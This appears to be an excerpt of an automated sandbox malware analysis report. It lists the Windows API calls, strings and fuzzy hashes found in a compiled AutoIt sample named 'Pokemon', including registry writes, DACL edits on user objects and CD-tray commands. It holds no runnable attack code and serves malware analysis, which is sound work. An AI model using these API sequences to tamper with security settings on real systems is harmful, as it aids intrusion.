• _wcslen.LIBCMT ref: 00120E25
• _wcslen.LIBCMT ref: 00120E8D
• _wcslen.LIBCMT ref: 00120F11
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00120F61
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00120FA0
  • Part of subcall function 000AFD52: _wcslen.LIBCMT ref: 000AFD5D
  • Part of subcall function 000F2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000F2BA5
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000F2BD7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                      • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                      • Opcode ID: 1d1cce7e10e862ca555cc06a5829e851222cf7541f5b630764b70aa2053b1a9d
                                                                                                                                                                                                                                                                                      • Instruction ID: d6a556550246a1f21781aa4444c2f4060b4b300d838726d2f56dd2864f031004
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d1cce7e10e862ca555cc06a5829e851222cf7541f5b630764b70aa2053b1a9d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09E1FF312082519FCB18DF24D9518BAB3E2FF99314B154A6CF896AB3A3DB30ED55CB41
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000925F8
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00092600
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009262B
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00092633
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00092658
                                                                                                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00092675
                                                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00092685
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000926B8
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000926CC
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 000926EA
                                                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00092706
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00092711
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetCursorPos.USER32(?), ref: 000919E1
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: ScreenToClient.USER32(00000000,?), ref: 000919FE
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000001), ref: 00091A23
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000002), ref: 00091A3D
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,0009199C), ref: 00092738
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                      • Opcode ID: 5290e87d098e7bbb53aff83ea023adf026136e3e8f5bafd578428fe567efe909
                                                                                                                                                                                                                                                                                      • Instruction ID: 3350d722afdd935765b525084c8a58622dbfce75feffb11c9f97afb31ec57fd6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5290e87d098e7bbb53aff83ea023adf026136e3e8f5bafd578428fe567efe909
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCB16B31A00209AFDF24DFA8DC55BAE7BB4FB48314F104229FA15A7290DB74E951DF61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 000F1A60
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A7B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,000F14E7,?,?,?), ref: 000F1A82
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 000F1A99
                                                                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000F1741
                                                                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000F1775
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F178C
                                                                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 000F17C6
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000F17E2
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 000F17F9
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 000F1801
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000F1808
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 000F1829
                                                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 000F1830
                                                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000F185F
                                                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000F1881
                                                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 000F1893
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F18BA
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18C1
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F18CA
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18D1
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000F18DA
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18E1
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000F18ED
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000F18F4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: GetProcessHeap.KERNEL32(00000008,000F14FD,?,00000000,?,000F14FD,?), ref: 000F1AED
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,000F14FD,?), ref: 000F1AF4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,000F14FD,?), ref: 000F1B03
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                      • Opcode ID: cc600d20d456e53685915a2b7696065dc859555b16f446a253044e90f2015144
                                                                                                                                                                                                                                                                                      • Instruction ID: a73054521ed710ce79e438cdb7b339a3ff70571534a424bd0650b52f89c4c701
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc600d20d456e53685915a2b7696065dc859555b16f446a253044e90f2015144
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39715BB2D00209FBDB20DFA4ED49FEEBBB8AF04740F144125FA15A6590DB349A56DB60
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011CF1D
                                                                                                                                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0012DCD0,00000000,?,00000000,?,?), ref: 0011CFA4
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0011D004
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011D054
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0011D0CF
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0011D112
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0011D221
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0011D2AD
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0011D2E1
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011D2EE
                                                                                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0011D3C0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                      • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                      • Opcode ID: 3b82302bc5298645c7754073c74a4eecb7166d050f4e930c48f07714c40a21a0
                                                                                                                                                                                                                                                                                      • Instruction ID: 628d364de9b33eba38ed9b8c848b64ad59a5af71cb4ad5d95be0218cd3ec7f55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b82302bc5298645c7754073c74a4eecb7166d050f4e930c48f07714c40a21a0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3125D356046019FDB18DF14D891BAAB7E5FF88714F14886CF89A9B3A2CB31ED41DB81
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00121462
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012149D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001214F0
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00121526
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001215A2
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0012161D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000AFD52: _wcslen.LIBCMT ref: 000AFD5D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 000F3547
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                      • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                      • Opcode ID: c70e8d644f971135dff625703ae96058fb145562eddeb0fbc97b50d56033d61a
                                                                                                                                                                                                                                                                                      • Instruction ID: f1e7a1745621c80555653f4d23bc39060f503620284c097f471dec1b28a1f180
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c70e8d644f971135dff625703ae96058fb145562eddeb0fbc97b50d56033d61a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EE1E131604351DFCB04EF24D4508AAB7E2FFA5314B14896CF896AB3A2DB30ED55CB81
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                      • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                      • Opcode ID: 999770718009e7a54e761fdbf90a29f0f642084732fa9fab1348751e52573f7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 62af04adbaa23bb887490153c7e69704ff5714a684d3882af874b8b56f82507d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 999770718009e7a54e761fdbf90a29f0f642084732fa9fab1348751e52573f7c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 067117326005268BCB189F7CEA415FB33A2AB64754B220134FC66AB695FB35DDC4C3A0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128DB5
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128DC9
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128DEC
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00128E0F
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00128E4D
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00126691), ref: 00128EA9
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00128EE2
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00128F25
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00128F5C
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00128F68
                                                                                                                                                                                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00128F78
                                                                                                                                                                                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,00126691), ref: 00128F87
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00128FA4
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00128FB0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                      • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0010493D
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00104948
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0010499F
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001049DD
                                                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00104A1B
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104A63
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104A9E
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00104ACC
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 000F6395
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000F63A7
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 000F63BE
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 000F63D3
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 000F63D9
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 000F63E9
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 000F63EF
                                                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000F6410
                                                                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000F642A
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000F6433
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F649A
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 000F64D6
                                                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 000F64DC
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000F64E3
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 000F653A
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 000F6547
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 000F656C
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000F6596
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 895679908-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00110884
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0011088F
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0011089A
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 001108A5
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 001108B0
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 001108BB
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 001108C6
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 001108D1
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 001108DC
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 001108E7
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 001108F2
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 001108FD
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00110908
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00110913
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0011091E
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00110929
                                                                                                                                                                                                                                                                                      • GetCursorInfo.USER32(?), ref: 00110939
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0011097B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e7c8f1f8ccda0dde86e8aca586de06907c852f3b12d5b0a25d55a78eea9f3186
                                                                                                                                                                                                                                                                                      • Instruction ID: d07b07d71495efaac08e25befbe244c3bea6d73a1ba8340f644d652a3a0c90d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7c8f1f8ccda0dde86e8aca586de06907c852f3b12d5b0a25d55a78eea9f3186
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 984145B0D083196ADB10DFB6CC8585EBFE8FF08754B50452AE11CE7291DB789941CF91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000B0436
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0016170C,00000FA0,DE3AC320,?,?,?,?,000D2733,000000FF), ref: 000B048C
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000D2733,000000FF), ref: 000B0497
